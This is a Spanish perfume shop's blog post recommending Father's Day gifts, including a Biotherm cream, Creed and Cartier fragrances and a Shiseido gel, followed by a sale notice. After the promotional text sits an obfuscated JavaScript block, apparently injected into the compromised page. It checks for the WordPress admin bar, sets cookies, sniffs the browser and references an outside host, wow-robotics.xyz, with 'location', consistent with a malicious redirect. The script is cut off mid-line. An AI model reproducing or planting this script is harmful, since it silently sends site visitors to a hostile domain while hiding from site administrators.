¿Piensas que cada vez es más difícil acertar con el regalo perfecto en el Día del Padre? Hoy en el blog de Perfumerías Tin Tin queremos compartir contigo una breve y sencilla guía de recomendaciones para encontrar el regalo perfecto para tu padre según sus gustos, intereses y necesidades. ¡Empezamos!

Años de experiencia, piel madura

¿Sus años de experiencia y trabajo se ven reflejados en su rostro? Puede recuperar la apariencia de juventud y la fortaleza de la piel del hombre con la crema multi-correctora de Biotherm  Homme Force Supreme Youth Architect Cream que actúa contra los signos visibles de la edad y que ha sido diseñada especialmente para el cuidado de la piel madura.

Force-supreme-2-Youth-architect-cream-Biotherm-Homme1

Un perfume nicho para un hombre con tradición

Si le gusta lo exclusivo y destaca por ser único, la casa de perfumes Creed, fundada en Londres en 1760, fue la perfumería favorita de la aristocracia británica y a día de hoy, siguen creando colonias y fragancias utilizando ingredientes de mejor calidad sin importar su coste.

El perfume Original Vetiver de Creed  es un viaje por los aromas más especiales de distintos lugares del mundo: Vetiver de Haïti con madera de sándalo de Mysore e iris de Florencia. ¡Perfecto amantes de los viajes y aventureros!

creed original vetiver

El poder de la inmortalidad a través de una fragancia

La nueva creación de Cartier, L’Envol ha sido ideada por la perfumista de la Maison, Mathilde Laurent, Quien alude al hidromiel, la bebida de los dioses del Olimpo para conseguir eternidad y llegar a lo más alto.

Este perfume es una joya para todo caballero que busca tendencias atemporales, es un líquido dotado de poder que exalta la mente e ilumina lo desconocido. Suave y viril.

L Envol Cartier

Una vida muy activa, largas jornadas de trabajo, viajes…

Hydro Master Gel de Shiseido Men es un gel hidratante refrescante que actúa de forma simultánea sobre diversos problemas en la piel masculina como la sequedad, brillos y poros dilatados, fatiga o estrés. ¡El equilibrio perfecto que necesita su piel!

SMN-Hydro-Master-Gel-8

Si te han gustado estas sugerencias, ¡tenemos más! Hasta el 19 de marzo puedes aprovechar descuentos del 20%, 30%, 40% y hasta un 50% en fragancias y cosmética masculina en nuestras sección de ofertas. ¡Encuentra el regalo perfecto para el Día del Padre en www.perfumestintin.com!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone